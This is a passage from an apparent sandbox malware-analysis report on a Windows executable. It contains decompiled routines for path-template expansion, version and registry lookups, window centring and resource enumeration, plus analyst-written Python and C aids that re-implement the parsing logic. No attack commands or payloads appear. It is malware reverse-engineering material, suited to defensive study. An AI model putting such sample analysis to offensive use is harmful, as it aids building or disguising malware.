• EndDialog.USER32(?,?), ref: 00403490
• GetDesktopWindow.USER32 ref: 0040349A
• SetWindowTextA.USER32(?,doza2), ref: 004034B2
• SetDlgItemTextA.USER32(?,00000838), ref: 004034C4
• SetForegroundWindow.USER32(?), ref: 004034CB
• EndDialog.USER32(?,00000002), ref: 004034D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Window$DialogText$DesktopForegroundItem
• String ID: doza2
• API String ID: 852535152-612509477
• Opcode ID: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
• Instruction ID: 9f86eaeb99706c3d809457defbd2d1e2bf9a223c622526840d8ada4286a6712c
• Opcode Fuzzy Hash: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
• Instruction Fuzzy Hash: 4601B131240214ABD7165F65DE0C96E3E68EB49702F104036FA46BE6E1CB789F52DB8E
Uniqueness
Uniqueness Score: -1.00%

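The function E00402AAC in the listing that follows is a path-template expander: it copies a source string byte by byte (IsDBCSLeadByte keeps two-byte characters together) and, on each '#', dispatches on the next character after CharUpperA: 'D' inserts the directory of the running module (GetModuleFileNameA, trailing backslash removed by the CharPrevA check), 'E' inserts the full module path, and '##' yields a literal '#'. The Python below re-implements that reading as an analyst's aid for decoding the sample's configuration strings; it is an added example, not code from the sample or from the Joe Sandbox report. Two points are assumptions: E004065E8 (not shown) is taken to strip the file name from the module path, and the common loop tail (label L17, outside the visible listing) is taken to advance the destination by the inserted length and the source past the directive. Unknown escapes and a trailing lone '#' depend on that unseen tail, so the function rejects them instead of guessing.

```python
"""Re-implementation of the '#' escape expansion seen in E00402AAC.

Semantics derived from the decompiled loop (analyst's reading, not the sample's code):
  '##'  -> literal '#'
  '#D'  -> directory of the running module, no trailing backslash (case-insensitive)
  '#E'  -> full path of the running module (case-insensitive)
Anything else after '#' is not determined by the visible listing and is rejected.
"""


def module_directory(module_path: str) -> str:
    """Directory part of the module path, as the '#D' branch produces it.

    ASSUMPTION: E004065E8 behaves like PathRemoveFileSpec. The visible CharPrevA
    check then NUL-terminates at a trailing backslash, so "C:\\a.exe" -> "C:".
    """
    head, sep, _name = module_path.rpartition("\\")
    if not sep:
        # No backslash at all: nothing to keep once the file name is removed.
        return ""
    return head


def expand_template(template: str, module_path: str) -> str:
    """Expand '#' escapes in `template` using `module_path` as GetModuleFileNameA's result.

    Raises ValueError for escapes whose behaviour the listing does not show.
    """
    out = []
    i = 0
    n = len(template)
    while i < n:
        ch = template[i]
        if ch != "#":
            # Plain byte (DBCS pairs are single str characters here): copy through.
            out.append(ch)
            i += 1
            continue
        # '#' seen: the sample advances the source (CharNextA) and inspects the
        # directive character through CharUpperA, so 'd'/'e' work like 'D'/'E'.
        i += 1
        if i >= n:
            raise ValueError("template ends in a lone '#': not determined by the listing")
        directive = template[i].upper()
        if directive == "D":
            out.append(module_directory(module_path))
        elif directive == "E":
            out.append(module_path)
        elif directive == "#":
            out.append("#")
        else:
            raise ValueError(f"unknown escape '#{template[i]}': not determined by the listing")
        # ASSUMPTION: the shared tail at L17 steps the source past the directive.
        i += 1
    return "".join(out)


if __name__ == "__main__":
    # Constructed inputs for illustration; the file name matches the analysed sample.
    exe = r"C:\Users\user\Desktop\szDGo5lHdI.exe"
    for tpl in (r"#D\out.txt", "#E", "##", "#d", "no escapes"):
        print(f"{tpl!r:16} -> {expand_template(tpl, exe)!r}")
```

Run against strings recovered from the process dump, the expander turns the '#D'/'#E' forms into the concrete paths the sample would have used on the analysis machine.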
C-Code - Quality: 95%
			E00402AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x408004; // 0x8f135e3b
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x409a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E004065E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                    								_t60 = _t12;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t42 =  *_t59;
                                                                                                                                                                                                                                    									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                    								} while (_t42 != 0);
                                                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                                                    								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_t65 = _t17;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00406CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                    			}
Per-line address column for the C-code above, separated from its code lines by extraction: addresses run from 0x00402aac to 0x00402bf8 (0x00000000 entries carry no address).

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00402AE6
                                                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00402AF2
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00402B12
                                                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00402B1E
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00402B55
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00402BD4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                                                    • Opcode ID: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
                                                                                                                                                                                                                                    • Instruction ID: 708e6bc04abe071344f259b5c123e55e43d0c35eeaa9831848c96a395a22173b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 144102345042855FDB159F308D08ABE7BB99F56304F1400BBE8C2A72C2DAB95E46CB99
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
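The tail of the decompiled routine above finds the end of the buffer by hand, calls CharPrevA(&_v268, &_v268[len]) on the terminator, and clears the byte only when the character CharPrevA returns is 0x5c. It does not simply test buf[len - 1] == '\\' because, under a DBCS system code page, 0x5c can be the trail byte of a two-byte character (the IsDBCSLeadByte and CharNextA calls in the API list are the same concern applied while walking forward). The following C program is an added example, not code from the sample or from Joe Sandbox: it reimplements that CharPrevA-style check portably and contrasts it with the naive last-byte test. The Shift-JIS lead-byte ranges stand in for IsDBCSLeadByte, the helper names are this example's own, and both input paths are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for IsDBCSLeadByte using the Shift-JIS (code page 932) lead-byte
   ranges. Assumption of this example: the process runs under a DBCS code page. */
static int is_dbcs_lead_byte(unsigned char c)
{
    return (c >= 0x81 && c <= 0x9F) || (c >= 0xE0 && c <= 0xFC);
}

/* Mimics CharPrevA(start, cur): walks forward from start so lead/trail pairs
   stay together and returns the first byte of the character before cur.
   Like the real API, returns start when cur is not past start. */
static const char *char_prev_dbcs(const char *start, const char *cur)
{
    const char *prev = start;
    const char *p = start;

    if (cur <= start)
        return start;
    while (p < cur) {
        prev = p;
        p += (is_dbcs_lead_byte((unsigned char)*p) && p[1] != '\0') ? 2 : 1;
    }
    return prev;
}

/* DBCS-aware trim, as the decompiled tail does it: strlen by hand, CharPrevA
   on the terminator, clear the byte only if that character is '\\'.
   Returns 1 if a byte was removed, 0 otherwise. */
int trim_trailing_backslash(char *path)
{
    size_t len = strlen(path);
    const char *last;

    if (len == 0)
        return 0;
    last = char_prev_dbcs(path, path + len);
    if (*last == '\\') {
        path[last - path] = '\0';
        return 1;
    }
    return 0;
}

/* Naive variant for contrast: inspects only the final byte. */
int trim_trailing_backslash_naive(char *path)
{
    size_t len = strlen(path);

    if (len != 0 && path[len - 1] == '\\') {
        path[len - 1] = '\0';
        return 1;
    }
    return 0;
}

/* Constructed sample 1: plain ASCII path with a trailing separator.
   Returns the number of bytes the DBCS-aware trim removed (1). */
int demo_ascii_trailing_sep(void)
{
    char path[] = "C:\\Users\\Public\\";
    size_t before = strlen(path);

    trim_trailing_backslash(path);
    return (int)(before - strlen(path));
}

/* Constructed sample 2: "C:\" followed by Shift-JIS katakana SO (0x83 0x5C),
   whose trail byte equals '\\'. Returns naive_removed * 10 + aware_removed:
   10 means the naive check corrupted the character and the aware one did not. */
int demo_sjis_trail_byte(void)
{
    char naive[] = "C:\\\x83\x5C";
    char aware[] = "C:\\\x83\x5C";

    return trim_trailing_backslash_naive(naive) * 10
         + trim_trailing_backslash(aware);
}

int main(void)
{
    printf("ascii bytes removed: %d\n", demo_ascii_trailing_sep());
    printf("sjis naive*10+aware: %d\n", demo_sjis_trail_byte());
    return 0;
}
```

For an analyst the practical reading is that this routine is a module-directory derivation (GetModuleFileNameA into a 0x104-byte buffer, uppercase walk, trailing separator stripped), and that its DBCS handling is a property of the Windows API pattern it copies rather than evidence of anything sample-specific.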

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00402773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x403938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x403938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402955
                                                                                                                                                                                                                                    0x0040295e
                                                                                                                                                                                                                                    0x00402962
                                                                                                                                                                                                                                    0x00402969
                                                                                                                                                                                                                                    0x0040296f
                                                                                                                                                                                                                                    0x00402974
                                                                                                                                                                                                                                    0x0040297e
                                                                                                                                                                                                                                    0x0040298c
                                                                                                                                                                                                                                    0x00402a20
                                                                                                                                                                                                                                    0x00402a21
                                                                                                                                                                                                                                    0x00402a27
                                                                                                                                                                                                                                    0x00402a4c
                                                                                                                                                                                                                                    0x00402a4f
                                                                                                                                                                                                                                    0x00402a50
                                                                                                                                                                                                                                    0x00402a53
                                                                                                                                                                                                                                    0x00402a56
                                                                                                                                                                                                                                    0x00402a5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004029b2
                                                                                                                                                                                                                                    0x004029b2
                                                                                                                                                                                                                                    0x004029b5
                                                                                                                                                                                                                                    0x004029bd
                                                                                                                                                                                                                                    0x004029c3
                                                                                                                                                                                                                                    0x004029cc
                                                                                                                                                                                                                                    0x004029d5
                                                                                                                                                                                                                                    0x004029d7
                                                                                                                                                                                                                                    0x004029da
                                                                                                                                                                                                                                    0x004029dd
                                                                                                                                                                                                                                    0x004029df
                                                                                                                                                                                                                                    0x004029ec
                                                                                                                                                                                                                                    0x004029f8
                                                                                                                                                                                                                                    0x004029fc
                                                                                                                                                                                                                                    0x004029ff
                                                                                                                                                                                                                                    0x00402a02
                                                                                                                                                                                                                                    0x00402a07
                                                                                                                                                                                                                                    0x00402a0a
                                                                                                                                                                                                                                    0x00402a0f
                                                                                                                                                                                                                                    0x00402a19
                                                                                                                                                                                                                                    0x00402a81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402a0f
                                                                                                                                                                                                                                    0x0040298c
                                                                                                                                                                                                                                    0x00402974
                                                                                                                                                                                                                                    0x00402962
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040294f
                                                                                                                                                                                                                                    0x00402912
                                                                                                                                                                                                                                    0x00402a65
                                                                                                                                                                                                                                    0x00402a68
                                                                                                                                                                                                                                    0x00402a6c
                                                                                                                                                                                                                                    0x00402a6f
                                                                                                                                                                                                                                    0x00402a6f
                                                                                                                                                                                                                                    0x00402a7d

APIs
• GlobalFree.KERNEL32 ref: 00402A6F
  • Part of subcall function 00402773: CharUpperA.USER32(8F135E3B,00000000,00000000,00000000), ref: 004027A8
  • Part of subcall function 00402773: CharNextA.USER32(0000054D), ref: 004027B5
  • Part of subcall function 00402773: CharNextA.USER32(00000000), ref: 004027BC
  • Part of subcall function 00402773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
  • Part of subcall function 00402773: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
  • Part of subcall function 00402773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
  • Part of subcall function 00402773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005), ref: 00402958
• GlobalLock.KERNEL32 ref: 00402969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005,?), ref: 00402A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403938,?,?), ref: 00402A81
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID: 89@
• API String ID: 3949799724-2908856592
• Opcode ID: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
• Instruction ID: 44ac0b4ed5788b328005fe1e31761a07754ab552c57995065579413dcf6dc051
• Opcode Fuzzy Hash: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
• Instruction Fuzzy Hash: 61511A31E00219DBCB21DFA9C988AAEB7B5FF48704F14407AE901B3391DB759A41DF99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
			E004043D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x408004; // 0x8f135e3b
				_v8 = _t29 ^ _t74; // MSVC /GS prologue: global security cookie XOR frame pointer, stored as the stack canary
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40); // screen rectangle of the first window (passed in ecx)
				_t53 = _v40.bottom - _v40.top; // height of the first window
				_v48 = _v40.right - _v40.left; // width of the first window
				GetWindowRect(_t68,  &_v24); // screen rectangle of the second window (passed in edx)
				_v56 = _v24.bottom - _v24.top; // height of the second window
                                                                                                                                                                                                                                    				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                    				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                    				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                    				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                    				_t56 = _v48;
                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                    				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                                                    				if(_t72 >= 0) {
                                                                                                                                                                                                                                    					_t63 = _v52;
                                                                                                                                                                                                                                    					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                    						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t72 = _t67;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00406CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                    			}
Instruction addresses: 0x004043d0 0x004043d8 0x004043df 0x004043e6 0x004043ec 0x004043f1 0x00404400 0x00404403 0x0040440b 0x00404420 0x00404429 0x00404437 0x00404444 0x00404447 0x0040444d 0x00404454 0x0040445b 0x00404460 0x00404461 0x00404467 0x0040446f 0x00404473 0x00404473 0x00404463 0x00404463 0x00404463 0x0040447a 0x00404481 0x00404484 0x0040448a 0x00404492 0x00404496 0x00404496 0x00404486 0x00404486 0x00404486 0x004044b8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004043F1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0040440B
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00404423
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040442E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040443A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00404447
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 004044A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                                                    • Opcode ID: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
                                                                                                                                                                                                                                    • Instruction ID: 70268ef729a394680d9897d7bab053961038611fd3359a441dc99da7ee3ef4ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA315E72E00219AFCB14CFB8DE889EEBBB5EB89310F154179F905F7280DA346C058B65
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E00406298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                                                    				_t16 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                                                    				E0040171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                                                    						 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                    						 *0x40a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_push(_t45);
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                                                    							E0040171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					return E00406CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750
